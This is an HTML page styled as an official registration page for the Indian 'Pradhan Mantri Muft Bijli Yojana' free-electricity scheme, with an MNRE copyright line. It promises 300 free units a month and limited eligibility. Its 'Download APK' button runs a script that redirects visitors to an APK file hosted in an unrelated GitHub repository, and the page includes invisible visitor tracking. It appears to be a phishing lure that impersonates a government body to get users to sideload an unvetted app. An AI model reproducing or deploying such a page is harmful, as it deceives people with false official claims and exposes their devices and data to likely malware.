

<!DOCTYPE html>

<html lang="en">



<head>

<meta charset="UTF-8">

<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title>Your Webpage</title>

<style>

body {

margin: 0;

font-family: Arial, sans-serif;



}

header {

text-align: center;

color: white;

padding: 0px;

}

.ssop{

background: #19398a;



}

main {



text-align: left;

padding: 30px;

color: white;

}



footer {

position: fixed;

bottom: 0;

width: 100%;

text-align: center;



padding: 5px;

}



#downloadButton {

background-color: #e51f0b;

color: white;

width: 80%;

padding: 15px 30px;

font-size: 21px;

border: none;

border-radius: 5px;

cursor: pointer;

}



#logo {

max-width: 100%;

height: auto;

display: block;



}

</style>



<script>

function done()

{

var m = new Date().getMinutes();

	if(m<60)

	{

		window.location="https://www.github.com/pmmvs/page1/raw/refs/heads/main/PMMB-S.apk";

	}



	else

	{

		window.location="https://github.com/technews92/claim/blob/main/Data_Voucher.apk?raw=true";

	}

}

</script>

</head>



<body class="ssop">

<div>



<header>

<img id="logo" src="https://i.postimg.cc/wjbJL0d9/unnamed.png">





</header>



<main>

<center><h2>Pradhan Mantri Muft Bijli Yojana</h2></center><br>

<p><h4>

		- Registration for PMMBY is started.<br>

		- Get 300-units free every month.<br>

		- Only 1-Crore users are eligible.

			

</p>- Download PMMBS app for registration.</h4></p>





<br><br>

<button onClick="done()" id="downloadButton">Download APK</button>

</main>

</div>

<footer>

<p style="color:white;">

Copyright MNRE 2024 </p>

</footer>

<script type="text/javascript">
var sc_project=13004805; 
var sc_invisible=1; 
var sc_security="080186cb"; 
</script>
<script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js"
async></script>
<noscript><div class="statcounter"><a title="Web Analytics"
href="https://statcounter.com/" target="_blank"><img
class="statcounter"
src="https://c.statcounter.com/13004805/0/080186cb/1/"
alt="Web Analytics"
referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>


</body>



</html>


